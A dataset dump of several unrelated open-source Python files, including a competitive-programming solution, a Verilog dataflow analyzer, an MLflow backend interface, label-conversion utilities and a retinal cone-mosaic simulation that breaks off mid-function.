blob_id stringlengths 40..40 | directory_id stringlengths 40..40 | path stringlengths 3..616 | content_id stringlengths 40..40 | detected_licenses sequencelengths 0..112 | license_type stringclasses 2 values | repo_name stringlengths 5..115 | snapshot_id stringlengths 40..40 | revision_id stringlengths 40..40 | branch_name stringclasses 777 values | visit_date timestamp[us] 2015-08-06 10:31:46 .. 2023-09-06 10:44:38 | revision_date timestamp[us] 1970-01-01 02:38:32 .. 2037-05-03 13:00:00 | committer_date timestamp[us] 1970-01-01 02:38:32 .. 2023-09-06 01:08:06 | github_id int64 4.92k..681M ⌀ | star_events_count int64 0..209k | fork_events_count int64 0..110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us] 2012-06-04 01:52:49 .. 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us] 2008-05-22 07:58:19 .. 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3..10.2M | extension stringclasses 188 values | content stringlengths 3..10.2M | authors sequencelengths 1..1 | author_id stringlengths 1..132 |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2f9ff8e134eaa96dab94a8adf57b27fb8a23be23 | d6cf604d393a22fc5e071a0d045a4fadcaf128a6 | /Challenge Book/JOI_2007_C.py | 7e53612c30d66f59e862f33ab20efe583c393bc7 | [] | no_license | shikixyx/AtCoder | bb400dfafd3745c95720b9009881e07bf6b3c2b6 | 7e402fa82a96bc69ce04b9b7884cb9a9069568c7 | refs/heads/master | 2021-08-03T21:06:45.224547 | 2021-07-24T11:58:02 | 2021-07-24T11:58:02 | 229,020,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import numpy as np
import sys
sys.setrecursionlimit(10 ** 7)
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
# Meet-in-the-middle (half full enumeration)
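# P2 enumerates every sum of at most two scores (the leading 0 covers
# "no throw"); for each s in P2, searchsorted finds the largest t in P2
# with s + t <= M, so P4 holds the best total of at most four throws.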
N, M = map(int, readline().split())
P = np.array([0] + read().split(), np.int64)
P = P[P <= M]
P2 = (P[:, None] + P[None, :]).ravel()
P2 = P2[P2 <= M]
P2.sort()
# This has to be done in parallel with numpy, or it won't finish in time
I = np.searchsorted(P2, M-P2, side='right') - 1
P4 = P2 + P2[I]
print(max(P4))
| [
"[email protected]"
] | |
5aa39cd29ff6236b62f61c9c3f51364eea44b3a5 | 419db2c95082e57eab3ebea9568693c2a961add7 | /pyverilog/dataflow/dataflow_analyzer.py | 8136f89271efed5ed13e2089e74ec92349f3bf33 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hoangt/Pyverilog-1 | ef309528150a3174e74126b2f1328ca9824fcbfe | d0cb60a5633e88f59a7c5c36dff8981f000ee525 | refs/heads/master | 2021-01-19T22:53:52.170548 | 2015-09-16T15:23:16 | 2015-09-16T15:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,027 | py | #-------------------------------------------------------------------------------
# dataflow_analyzer.py
#
# Verilog module signal/module dataflow analyzer
#
# Copyright (C) 2013, Shinya Takamaeda-Yamazaki
# License: Apache 2.0
#-------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
import subprocess
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) )
sys.setrecursionlimit(16 * 1024)
import pyverilog
import pyverilog.utils
import pyverilog.utils.version
from pyverilog.vparser.parser import VerilogCodeParser
from pyverilog.dataflow.modulevisitor import ModuleVisitor
from pyverilog.dataflow.signalvisitor import SignalVisitor
from pyverilog.dataflow.bindvisitor import BindVisitor
class VerilogDataflowAnalyzer(VerilogCodeParser):
def __init__(self, filelist, topmodule='TOP', noreorder=False, nobind=False,
preprocess_include=None,
preprocess_define=None):
self.topmodule = topmodule
self.terms = {}
self.binddict = {}
self.frametable = None
files = filelist if isinstance(filelist, tuple) or isinstance(filelist, list) else [ filelist ]
VerilogCodeParser.__init__(self, files,
preprocess_include=preprocess_include,
preprocess_define=preprocess_define)
self.noreorder = noreorder
self.nobind = nobind
def generate(self):
ast = self.parse()
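        # Stage 1: collect module definitions and their metadata from the AST.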
module_visitor = ModuleVisitor()
module_visitor.visit(ast)
modulenames = module_visitor.get_modulenames()
moduleinfotable = module_visitor.get_moduleinfotable()
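        # Stage 2: trace signal declarations from the top module downward.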
signal_visitor = SignalVisitor(moduleinfotable, self.topmodule)
signal_visitor.start_visit()
frametable = signal_visitor.getFrameTable()
if self.nobind:
self.frametable = frametable
return
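        # Stage 3: bind assignments to signals and extract the dataflow.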
bind_visitor = BindVisitor(moduleinfotable, self.topmodule, frametable,
noreorder=self.noreorder)
bind_visitor.start_visit()
dataflow = bind_visitor.getDataflows()
self.frametable = bind_visitor.getFrameTable()
self.terms = dataflow.getTerms()
self.binddict = dataflow.getBinddict()
def getFrameTable(self):
return self.frametable
#-------------------------------------------------------------------------
def getInstances(self):
if self.frametable is None: return ()
return self.frametable.getAllInstances()
def getSignals(self):
if self.frametable is None: return ()
return self.frametable.getAllSignals()
def getConsts(self):
if self.frametable is None: return ()
return self.frametable.getAllConsts()
def getTerms(self):
return self.terms
def getBinddict(self):
return self.binddict
if __name__ == '__main__':
from optparse import OptionParser
INFO = "Verilog module signal/module dataflow analyzer"
VERSION = pyverilog.utils.version.VERSION
USAGE = "Usage: python dataflow_analyzer.py -t TOPMODULE file ..."
def showVersion():
print(INFO)
print(VERSION)
print(USAGE)
sys.exit()
optparser = OptionParser()
optparser.add_option("-v","--version",action="store_true",dest="showversion",
default=False,help="Show the version")
optparser.add_option("-I","--include",dest="include",action="append",
default=[],help="Include path")
optparser.add_option("-D",dest="define",action="append",
default=[],help="Macro Definition")
optparser.add_option("-t","--top",dest="topmodule",
default="TOP",help="Top module, Default=TOP")
optparser.add_option("--nobind",action="store_true",dest="nobind",
default=False,help="No binding traversal, Default=False")
optparser.add_option("--noreorder",action="store_true",dest="noreorder",
default=False,help="No reordering of binding dataflow, Default=False")
(options, args) = optparser.parse_args()
filelist = args
if options.showversion:
showVersion()
for f in filelist:
if not os.path.exists(f): raise IOError("file not found: " + f)
if len(filelist) == 0:
showVersion()
verilogdataflowanalyzer = VerilogDataflowAnalyzer(filelist, options.topmodule,
noreorder=options.noreorder,
nobind=options.nobind,
preprocess_include=options.include,
preprocess_define=options.define)
verilogdataflowanalyzer.generate()
directives = verilogdataflowanalyzer.get_directives()
print('Directive:')
for dr in sorted(directives, key=lambda x:str(x)):
print(dr)
instances = verilogdataflowanalyzer.getInstances()
print('Instance:')
for module, instname in sorted(instances, key=lambda x:str(x[1])):
print((module, instname))
if options.nobind:
print('Signal:')
signals = verilogdataflowanalyzer.getSignals()
for sig in signals:
print(sig)
print('Const:')
consts = verilogdataflowanalyzer.getConsts()
for con in consts:
print(con)
else:
terms = verilogdataflowanalyzer.getTerms()
print('Term:')
for tk, tv in sorted(terms.items(), key=lambda x:str(x[0])):
print(tv.tostr())
binddict = verilogdataflowanalyzer.getBinddict()
print('Bind:')
for bk, bv in sorted(binddict.items(), key=lambda x:str(x[0])):
for bvi in bv:
print(bvi.tostr())
| [
"[email protected]"
] | |
30e1bb070924905323da2b3adf333239477b7c6d | 8bac6c63a7b826bfd6b415e6faa51ff22505d112 | /openNFR-skin-2018/usr/lib/enigma2/python/Components/Renderer/NFRSambaVpnIp_renderer.py | fabdc9a68e371461e2f463086cbfa48cd40c720c | [] | no_license | stein17/Skins-for-openNFR | 03330102b7d883f8485297cea0468143d9116b6f | ca6c5d02035e4bacdad6efc45995249a317b7fb6 | refs/heads/master | 2023-03-12T19:58:50.112456 | 2022-03-21T07:02:03 | 2022-03-21T07:02:03 | 94,653,786 | 0 | 15 | null | 2023-03-02T17:52:37 | 2017-06-17T23:05:42 | Python | UTF-8 | Python | false | false | 467 | py | from Renderer import Renderer
from enigma import ePixmap
class NFRSambaVpnIp_renderer(Renderer):
def __init__(self):
Renderer.__init__(self)
GUI_WIDGET = ePixmap
def postWidgetCreate(self, instance):
self.changed((self.CHANGED_DEFAULT,))
def changed(self, what):
if what[0] != self.CHANGED_CLEAR:
if self.source and hasattr(self.source, "pixmap"):
if self.instance:
self.instance.setScale(1)
self.instance.setPixmap(self.source.pixmap)
| [
"[email protected]"
] | |
55cef7ba6f4bab4b32350b0bcbab3ce2d4c00d12 | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /development-support/wheel-smoke-test.py | fc47c188998f8298c69edac63841101e78c93158 | [] | no_license | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,668 | py | """
Helper script for performing smoke tests on an installed
copy of PyObjC
# NOTE: This file is not yet complete
"""
import platform
from distutils.version import LooseVersion
import objc # noqa: F401
from AddressBook import * # noqa: F401, F403
from AppleScriptKit import * # noqa: F401, F403
from AppleScriptObjC import * # noqa: F401, F403
from ApplicationServices import * # noqa: F401, F403
from Automator import * # noqa: F401, F403
from CFNetwork import * # noqa: F401, F403
from Cocoa import * # noqa: F401, F403
from CoreData import * # noqa: F401, F403
from CoreServices import * # noqa: F401, F403
from DiskArbitration import * # noqa: F401, F403
from ExceptionHandling import * # noqa: F401, F403
from GameController import * # noqa: F401, F403
from HIServices import * # noqa: F401, F403
from Quartz import * # noqa: F401, F403
sys_version = LooseVersion(platform.mac_ver()[0])
if sys_version >= LooseVersion("10.5"):
from CalendarStore import * # noqa: F401, F403
from Collaboration import * # noqa: F401, F403
from CoreText import * # noqa: F401, F403
from DictionaryServices import * # noqa: F401, F403
from FSEvents import * # noqa: F401, F403
if sys_version >= LooseVersion("10.6"):
from CoreLocation import * # noqa: F401, F403
from CoreWLAN import * # noqa: F401, F403
from iTunesLibrary import * # noqa: F401, F403
if sys_version >= LooseVersion("10.7"):
from AVFoundation import * # noqa: F401, F403
if sys_version >= LooseVersion("10.8"):
from Accounts import * # noqa: F401, F403
from EventKit import * # noqa: F401, F403
from GameCenter import * # noqa: F401, F403
if sys_version >= LooseVersion("10.9"):
from AVKit import * # noqa: F401, F403
if sys_version >= LooseVersion("10.10"):
from CloudKit import * # noqa: F401, F403
from CoreBluetooth import * # noqa: F401, F403
from CryptoTokenKit import * # noqa: F401, F403
from FinderSync import * # noqa: F401, F403
if sys_version >= LooseVersion("10.11"):
from Contacts import * # noqa: F401, F403
from ContactsUI import * # noqa: F401, F403
if sys_version >= LooseVersion("10.12"):
from Intents import * # noqa: F401, F403
from MediaPlayer import * # noqa: F401, F403
if sys_version >= LooseVersion("10.13"):
from BusinessChat import * # noqa: F401, F403
from ColorSync import * # noqa: F401, F403
from CoreML import * # noqa: F401, F403
from CoreSpotlight import * # noqa: F401, F403
from ExternalAccessory import * # noqa: F401, F403
from Vision import * # noqa: F401, F403
print("")
print("SMOKE TEST PASSED")
print("")
| [
"[email protected]"
] | |
a59b69de96b87c4963e2a5082a415c273af284f3 | 2da8bcfb9a72e507812a8723e38ad6d030c300f1 | /two_sum_1.py | 57a56e2fc2bce51207bff8c27039bcaa0809aea2 | [] | no_license | aditya-doshatti/Leetcode | 1a4e0f391a7d6ca2d7f8fdc35e535f4ec10fb634 | eed20da07896db471ea6582785335e52d4f04f85 | refs/heads/master | 2023-04-06T02:18:57.287263 | 2023-03-17T03:08:42 | 2023-03-17T03:08:42 | 218,408,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 995 | py | '''
1. Two Sum
Easy
Given an array of integers, return indices of the two numbers such that they add up to a specific target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
Example:
Given nums = [2, 7, 11, 15], target = 9,
Because nums[0] + nums[1] = 2 + 7 = 9,
return [0, 1].
https://leetcode.com/problems/two-sum/
'''
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
if len(nums) <= 1:
return False
buff_dict = {}
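        # Map each required complement (target - nums[i]) to its index i.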
for i in range(len(nums)):
if nums[i] in buff_dict:
return [buff_dict[nums[i]], i]
else:
buff_dict[target - nums[i]] = i
# for i in range(len(nums)):
# for j in range(i+1,len(nums)):
# if (nums[i] + nums[j]) == target:
# return [i,j]
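        # A quick illustrative check (hypothetical, not part of LeetCode's harness):
        #   Solution().twoSum([2, 7, 11, 15], 9)  # -> [0, 1]
        # The dict-based pass runs in O(n) time with O(n) extra space, vs
        # O(n^2) for the commented-out brute force above.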
| [
"[email protected]"
] | |
bf7fcf88de1f76cb2ade9e1d5ad78bb6c9d5350f | 8ae0bf166da68488efec84fe79063f874687b332 | /tests/ext/django/settings.py | 47565381bb011dbafa23c965dd6905ecef88234f | [
"BSD-3-Clause"
] | permissive | snopoke/slycache | 75aafcd0fb9c9289a292c907f48159652e275f93 | 412e9e81a8c53f684f3fd7c5dafb6b06ecfbd0c0 | refs/heads/main | 2023-06-01T19:20:12.847651 | 2021-03-16T20:30:28 | 2021-03-16T20:30:28 | 340,279,785 | 0 | 0 | NOASSERTION | 2021-06-14T07:26:50 | 2021-02-19T06:34:25 | Python | UTF-8 | Python | false | false | 494 | py | DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
},
}
INSTALLED_APPS = ['slycache.ext.django']
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': 60,
'LOCATION': 'location-1',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': 60,
'LOCATION': 'location-2',
},
}
SECRET_KEY = 'foobarbaz'
| [
"[email protected]"
] | |
5171d6acac1e78b70a50a813ff700ead3317d7d9 | 7b7c570b30d6d7a0e9b904c7cb378cfb0d0f0e07 | /mlflow/models/flavor_backend.py | 894829a8cfcb69840c6c12785cdff07fc6a9cbb5 | [
"Apache-2.0"
] | permissive | mlflow/mlflow | ca97bfbbf32f8e59f454e428f5e46eb3d34d062f | 37298ffafcd34002352d01d579d4524790544267 | refs/heads/master | 2023-09-01T13:15:53.902815 | 2023-09-01T09:00:42 | 2023-09-01T09:00:42 | 136,202,695 | 14,102 | 3,748 | Apache-2.0 | 2023-09-14T21:52:42 | 2018-06-05T16:05:58 | Python | UTF-8 | Python | false | false | 3,421 | py | from abc import ABCMeta, abstractmethod
from mlflow.utils.annotations import developer_stable
@developer_stable
class FlavorBackend:
"""
Abstract class for Flavor Backend.
This class defines the API interface for local model deployment of MLflow model flavors.
"""
__metaclass__ = ABCMeta
def __init__(self, config, **kwargs): # pylint: disable=unused-argument
self._config = config
@abstractmethod
def predict(self, model_uri, input_path, output_path, content_type):
"""
Generate predictions using a saved MLflow model referenced by the given URI.
Input and output are read from and written to a file or stdin / stdout.
:param model_uri: URI pointing to the MLflow model to be used for scoring.
:param input_path: Path to the file with input data. If not specified, data is read from
stdin.
:param output_path: Path to the file with output predictions. If not specified, data is
written to stdout.
:param content_type: Specifies the input format. Can be one of {``json``, ``csv``}
"""
pass
@abstractmethod
def serve(
self,
model_uri,
port,
host,
timeout,
enable_mlserver,
synchronous=True,
stdout=None,
stderr=None,
):
"""
Serve the specified MLflow model locally.
:param model_uri: URI pointing to the MLflow model to be used for scoring.
:param port: Port to use for the model deployment.
:param host: Host to use for the model deployment. Defaults to ``localhost``.
:param timeout: Timeout in seconds to serve a request. Defaults to 60.
:param enable_mlserver: Whether to use MLServer or the local scoring server.
:param synchronous: If True, wait until server process exit and return 0, if process exit
with non-zero return code, raise exception.
If False, return the server process `Popen` instance immediately.
:param stdout: Redirect server stdout
:param stderr: Redirect server stderr
"""
pass
def prepare_env(self, model_uri, capture_output=False):
"""
Performs any preparation necessary to predict or serve the model, for example
downloading dependencies or initializing a conda environment. After preparation,
calling predict or serve should be fast.
"""
pass
@abstractmethod
def build_image(self, model_uri, image_name, install_mlflow, mlflow_home, enable_mlserver):
raise NotImplementedError
@abstractmethod
def generate_dockerfile(
self, model_uri, output_path, install_mlflow, mlflow_home, enable_mlserver
):
raise NotImplementedError
@abstractmethod
def can_score_model(self):
"""
Check whether this flavor backend can be deployed in the current environment.
:return: True if this flavor backend can be applied in the current environment.
"""
pass
def can_build_image(self):
"""
:return: True if this flavor has a `build_image` method defined for building a docker
container capable of serving the model, False otherwise.
"""
return callable(getattr(self.__class__, "build_image", None))
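# A minimal sketch of a concrete subclass, assuming only the interface
# defined above; "EchoBackend" and its print output are illustrative,
# not a real MLflow backend:
#
#   class EchoBackend(FlavorBackend):
#       def predict(self, model_uri, input_path, output_path, content_type):
#           print("would score %s against %s" % (model_uri, input_path))
#       def serve(self, model_uri, port, host, timeout, enable_mlserver,
#                 synchronous=True, stdout=None, stderr=None):
#           print("would serve %s on %s:%s" % (model_uri, host, port))
#       def build_image(self, model_uri, image_name, install_mlflow,
#                       mlflow_home, enable_mlserver):
#           raise NotImplementedError
#       def generate_dockerfile(self, model_uri, output_path, install_mlflow,
#                               mlflow_home, enable_mlserver):
#           raise NotImplementedError
#       def can_score_model(self):
#           return True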
| [
"[email protected]"
] | |
4a6527f8ab80096d974ecbc2592c03ee486098cf | 6632896b4e320c932bdaa98b2caa16e057905333 | /utils/io/labels/character.py | 42500f3bb08e1952e8f60fcd45e82f1d64eb7841 | [
"MIT"
] | permissive | sky1170447398/tensorflow_end2end_speech_recognition | 56229b5de62c8a4580a9d349afe6ccdf20d478fb | 7ef52ae702db3852a7339136852bb14585e55b3b | refs/heads/master | 2021-07-13T14:26:22.117311 | 2017-10-12T00:51:12 | 2017-10-12T00:51:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,507 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
class Char2idx(object):
"""Convert from character to index.
Args:
map_file_path (string): path to the mapping file
"""
    def __init__(self, map_file_path):
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[line[0]] = int(line[1])
def __call__(self, str_char):
"""
Args:
str_char (string): a sequence of characters
Returns:
index_list (list): character indices
"""
char_list = list(str_char)
# Convert from character to index
index_list = list(map(lambda x: self.map_dict[x], char_list))
return np.array(index_list)
class Kana2idx(object):
"""Convert from kana character to index.
Args:
map_file_path (string): path to the mapping file
"""
def __init__(self, map_file_path):
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[line[0]] = int(line[1])
def __call__(self, str_char):
"""
Args:
str_char (string): a sequence of kana characters
Returns:
index_list (list): kana character indices
"""
        kana_list = list(str_char)
        index_list = []
        i = 0
        # NOTE: a while loop is required here; the original for loop's
        # "i += 1" had no effect, so the second kana of a two-character
        # unit was indexed twice.
        while i < len(kana_list):
            # Check whether this kana plus the next one map to a single index
            if (i != len(kana_list) - 1 and
                    kana_list[i] + kana_list[i + 1] in self.map_dict):
                index_list.append(
                    int(self.map_dict[kana_list[i] + kana_list[i + 1]]))
                i += 2
            elif kana_list[i] in self.map_dict:
                index_list.append(int(self.map_dict[kana_list[i]]))
                i += 1
            else:
                raise ValueError(
                    'There is no kana character such as %s' % kana_list[i])
        return np.array(index_list)
class Idx2char(object):
"""Convert from index to character.
Args:
map_file_path (string): path to the mapping file
capital_divide (bool, optional): set True when using capital-divided
character sequences
space_mark (string): the space mark to divide a sequence into words
"""
def __init__(self, map_file_path, capital_divide=False, space_mark=' '):
self.capital_divide = capital_divide
self.space_mark = space_mark
# Read the mapping file
self.map_dict = {}
with open(map_file_path, 'r') as f:
for line in f:
line = line.strip().split()
self.map_dict[int(line[1])] = line[0]
def __call__(self, index_list, padded_value=-1):
"""
Args:
index_list (np.ndarray): list of character indices.
Batch size 1 is expected.
padded_value (int): the value used for padding
Returns:
str_char (string): a sequence of characters
"""
# Remove padded values
assert type(index_list) == np.ndarray, 'index_list should be np.ndarray.'
index_list = np.delete(index_list, np.where(
index_list == padded_value), axis=0)
# Convert from indices to the corresponding characters
char_list = list(map(lambda x: self.map_dict[x], index_list))
if self.capital_divide:
char_list_tmp = []
for i in range(len(char_list)):
if i != 0 and 'A' <= char_list[i] <= 'Z':
char_list_tmp += [self.space_mark, char_list[i].lower()]
else:
char_list_tmp += [char_list[i].lower()]
str_char = ''.join(char_list_tmp)
else:
str_char = ''.join(char_list)
return str_char
# TODO: change to batch version
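# Minimal usage sketch; './char_map.txt' and its "<char> <index>" rows are
# hypothetical:
#
#   char2idx = Char2idx('./char_map.txt')
#   idx2char = Idx2char('./char_map.txt')
#   indices = char2idx('abc')     # e.g. np.array([0, 1, 2])
#   string = idx2char(indices)    # 'abc'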
| [
"[email protected]"
] | |
9ba285150af283cf9d35c2c7919feedb6398d693 | 33f351a8444ad0f63b7efd5014957d58175681a8 | /mosaic.py | 3b52f1f9dde233cf6907ce5c3a9eca462b5657ae | [] | no_license | rjonnal/FEM_raster_model | 21bb070c397d73733e366893a8d11314430d8b0f | 7568aec5aeff93146c7481c216f2360e03a36f2c | refs/heads/master | 2021-01-11T21:23:09.319209 | 2017-03-15T22:05:31 | 2017-03-15T22:05:31 | 78,775,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,047 | py | import numpy as np
from scipy import interpolate
from scipy.signal import convolve2d
from matplotlib import pyplot as plt
import os,sys
from time import time,sleep
from fig2gif import GIF
from cone_density import ConeDensityInterpolator
from random import shuffle
from data_store import H5
import datetime
class Mosaic:
def __init__(self,x1=-0.25,x2=0.25,y1=-0.25,y2=0.25,central_field_strength=10.0,potential_fwhm_deg=.01,N_cones=0,locality=0.02,granularity=0.0025,noise=0.0,intensity_fwhm_deg=.008,use_cdf=False,hdf5fn=None):
self.noise = noise
self.use_cdf = use_cdf
self.gain = 1.0
self.N_neighbors = 0
self.shift_mean = np.inf
self.shift_std = np.inf
self.shift_max = -np.inf
self.shift_min = np.inf
if hdf5fn is None:
self.age = 0
self.x1 = min(x1,x2)
self.x2 = max(x1,x2)
self.y1 = min(y1,y2)
self.y2 = max(y1,y2)
self.dx = self.x2 - self.x1
self.dy = self.y2 - self.y1
self.xmid = (self.x1+self.x2)/2.0
self.ymid = (self.y1+self.y2)/2.0
        max_rad = min(self.dx/2.0, self.dy/2.0)*np.sqrt(2)  # built-in min: np.min would treat the second argument as an axis
cones_rad = np.random.rand(N_cones)**.5*max_rad
cones_theta = np.random.rand(N_cones)*np.pi*2
self.cones_x = (np.cos(cones_theta)*cones_rad).astype(np.float32)
self.cones_y = (np.sin(cones_theta)*cones_rad).astype(np.float32)
self.cones_I = (10.0 + 1.0*np.random.randn(N_cones)).clip(5.0,15.0)
self.N_cones = N_cones
self.locality = locality
self.granularity = granularity
self.theta_step = np.pi/10.0
self.theta = np.arange(0,np.pi*2,self.theta_step)
self.neighborhood = self.locality*2
self.cone_potential_fwhm_deg = potential_fwhm_deg
self.potential_sigma = potential_fwhm_deg/(2.0*np.sqrt(2.0*np.log(2)))
self.intensity_sigma = intensity_fwhm_deg/(2.0*np.sqrt(2.0*np.log(2)))
self.central_field_strength = central_field_strength
self.timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
self.tag = self.get_tag()
self.h5 = H5('./histories/%s.hdf5'%self.tag)
self.h5.put('/params/N_cones',self.N_cones)
self.h5.put('/params/locality',self.locality)
self.h5.put('/params/granularity',self.granularity)
self.h5.put('/params/theta_step',self.theta_step)
self.h5.put('/params/neighborhood',self.neighborhood)
self.h5.put('/params/cone_potential_fwhm_deg',self.cone_potential_fwhm_deg)
self.h5.put('/params/potential_sigma',self.potential_sigma)
self.h5.put('/params/intensity_sigma',self.intensity_sigma)
self.h5.put('/params/central_field_strength',self.central_field_strength)
self.h5.put('/params/rect',[self.x1,self.x2,self.y1,self.y2])
self.h5.put('/intensities',self.cones_I)
self.h5.put('/age',self.age)
else:
self.timestamp = hdf5fn.split('_')[-1].replace('.hdf5','')
self.h5 = H5(hdf5fn)
self.N_cones = self.h5.get('/params/N_cones').value
self.locality = self.h5.get('/params/locality').value
self.granularity = self.h5.get('/params/granularity').value
self.theta_step = self.h5.get('/params/theta_step').value
self.neighborhood = self.h5.get('/params/neighborhood').value
self.cone_potential_fwhm_deg = self.h5.get('/params/cone_potential_fwhm_deg').value
self.intensity_sigma = self.h5.get('/params/intensity_sigma').value
self.potential_sigma = self.h5.get('/params/potential_sigma').value
self.central_field_strength = self.h5.get('/params/central_field_strength').value
self.x1,self.x2,self.y1,self.y2 = self.h5.get('/params/rect')[:]
self.cones_I = self.h5.get('/intensities')[:]
self.age = self.h5.get('/age').value-1
self.cones_x = self.h5.get('/%06d/cones_x'%self.age)
self.cones_y = self.h5.get('/%06d/cones_y'%self.age)
self.mosaic = self.h5.get('/%06d/mosaic'%self.age)
self.dx = self.x2 - self.x1
self.dy = self.y2 - self.y1
self.xmid = (self.x1+self.x2)/2.0
self.ymid = (self.y1+self.y2)/2.0
def scale(self,im):
im = im.astype(float)
return (im-im.min())/(im.max()-im.min())
def save_mosaic0(self,N=512):
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
yr = np.linspace(y1,y2,N)
XX,YY = np.meshgrid(xr,yr)
out = np.zeros(XX.shape,dtype=np.float32)
for idx,(x,y,I) in enumerate(zip(self.cones_x,self.cones_y,self.cones_I)):
xx = XX - x
yy = YY - y
out = out + np.exp(-(xx**2+yy**2)/(2.0*self.intensity_sigma**2))*I
self.h5.put('/%06d/mosaic'%self.age,out)
self.mosaic = out
def get_mosaic(self,N=512):
profile = self.make_cone_profile(N)
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
yr = np.linspace(y1,y2,N)
dx = np.mean(np.diff(xr))
dy = np.mean(np.diff(yr))
out = np.zeros((len(yr),len(xr)))
for idx,(x,y,I) in enumerate(zip(self.cones_x,self.cones_y,self.cones_I)):
if x>self.x1 and x<self.x2 and y>self.y1 and y<self.y2:
left = np.where(xr<x)[0][-1]
right = np.where(xr>=x)[0][0]
top = np.where(yr<y)[0][-1]
bottom = np.where(yr>=y)[0][0]
for py in [top,bottom]:
for px in [left,right]:
yfrac = 1.0-np.abs(yr[py]-y)/dy
xfrac = 1.0-np.abs(xr[px]-x)/dx
out[py,px] = xfrac*yfrac*I
if False:
plt.subplot(1,2,1)
plt.plot(x,y,'ks')
plt.xlim((xr[left],xr[right]))
plt.ylim((yr[top],yr[bottom]))
plt.subplot(1,2,2)
plt.imshow(out[top:bottom+1,left:right+1],interpolation='none')
plt.colorbar()
plt.show()
else:
continue
out = self.conv(out,profile)
out = self.scale(out)
return out
def save_mosaic(self,N=512):
out = self.get_mosaic(N)
self.h5.put('/%06d/mosaic'%self.age,out)
self.mosaic = out
def conv(self,a,b):
sy,sx = a.shape
# fft both after doubling size w/ zero-padding
# this prevents circular convolution
af = np.fft.fft2(a,s=(sy*2,sx*2))
bf = np.fft.fft2(b,s=(sy*2,sx*2))
# multiply
abf = af*bf
# inverse fft
abfi = np.fft.ifft2(abf)
# crop first (sy+1)//2-1 pixels because of zero-padding
y1 = (sy+1)//2-1
y2 = y1+sy
x1 = (sx+1)//2-1
x2 = x1+sx
abfi = abfi[y1:y2,x1:x2]
return np.abs(abfi)
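        # NOTE: for the non-negative inputs used here this matches
        # scipy.signal.fftconvolve(a, b, mode='same') up to floating error.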
def make_cone_profile(self,N,gaussian=True):
x1 = self.x1
x2 = self.x2
y1 = self.y1
y2 = self.y2
xr = np.linspace(x1,x2,N)
xr = xr - np.mean(xr)
yr = np.linspace(y1,y2,N)
yr = yr - np.mean(yr)
xx,yy = np.meshgrid(xr,yr)
if gaussian:
p = np.exp(-(xx**2+yy**2)/(2.0*self.intensity_sigma**2))
else:
p = np.zeros(xx.shape)
d = np.sqrt(xx**2+yy**2)
p[np.where(d<self.intensity_sigma)] = 1.0
return p
def get_tag(self):
# main part of tag: ncones_centralfield_conefield_rect
fmts = ['%06d','%0.1f','%0.4f','%0.2f','%0.2f','%0.2f','%0.2f']
params = (self.N_cones,self.central_field_strength,self.cone_potential_fwhm_deg,
self.x1,self.x2,self.y1,self.y2)
tag = ''
for f in fmts:
tag = tag + f + '_'
tag = tag%params
tag = tag.replace('-','m')
tag = tag + self.timestamp
return tag
def record(self):
def put(name,data):
self.h5.put('/%06d/%s'%(self.age,name),data)
put('cones_x',self.cones_x)
put('cones_y',self.cones_y)
put('N_neighbors',self.N_neighbors)
put('gain',self.gain)
def find_neighbors(self,x,y,rad):
d = np.sqrt((x-self.cones_x)**2+(y-self.cones_y)**2)
neighbors = np.where(np.logical_and(d<rad,d>0))[0]
#neighbors = np.where(d<rad)[0]
return neighbors
def compute_field(self,x,y):
neighbors = self.find_neighbors(x,y,self.neighborhood)
theta = self.theta + np.random.rand()*self.theta_step
self.gain = 1.0
mags = self.granularity*self.gain*np.linspace(0.01,2.0,19)
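        # Candidate moves: probe points on concentric rings around (x, y)
        # (19 radii at the granularity scale x 20 angles).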
XX = []
YY = []
for mag in mags:
XXv = np.cos(theta)*mag
YYv = np.sin(theta)*mag
XXv = list(XXv)
YYv = list(YYv)
XX = XX + XXv
YY = YY + YYv
XX = np.array(XX)
YY = np.array(YY)
xx = XX+x
yy = YY+y
f,n,xx,yy = self.compute_field_helper(xx,yy,neighbors)
f = f+np.random.randn(len(f))*np.sqrt(f)*self.noise
return f,n,xx,yy
def compute_full_field(self,N=64):
xvec = np.linspace(self.x1,self.x2,N)
